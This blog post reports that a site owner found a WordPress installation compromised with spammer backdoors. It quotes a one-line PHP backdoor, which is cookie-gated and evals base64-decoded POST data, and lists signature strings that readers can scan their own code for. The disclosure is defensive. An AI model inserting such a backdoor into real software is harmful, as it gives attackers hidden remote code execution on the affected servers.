Website was Down Due to Compromised WordPress System

If you attempted to access the site for the past 24+ hours I apologize for the prolonged downtime. I upgraded the WordPress system the blog runs on (complete with fail, and no thanks to the WordPress community in #wordpress for their non-help — I definitely will switch the blog to another system after 1.7’s release, and recommend prospective users to stay away from them and their system), and found compromised files throughout the system.

I believe I have corrected/removed the backdoor mechanisms which spammers have been using against the site, but there’s no evidence that the wacky WordPress system the site is now running on doesn’t have other compromised files, as well as the security holes through which the crackers originally got in.

Several compromised files had this line inserted at the beginning,

<?php if(md5($_COOKIE['_wp_debugger'])==”5fd808ac028e5197dd69318e32407eb7″){ eval(base64_decode($_POST['file'])); exit; } ?>

Others were disguised as image files, with file extensions of “pngg” and “jpgg”, and beginning with “

If you want to check your site for similarly compromised files and backdoors, search through your site code for signatures such as “qwerty”, “4008deadb16536f48b84fdc70f194dac”, “find suid files”, “_wp_debugger”, “5fd808ac028e5197dd69318e32407eb7″. The signatures are sure to change, as they’re used to activate the backdoor scripts, but at least you have a way to check current installations for these same spammers.

All in all, an unhealthy state of affairs for the Content Management System (CMS) industry. The market is still up for grabs.

Leave a Reply

Your email address will not be published. Required fields are marked *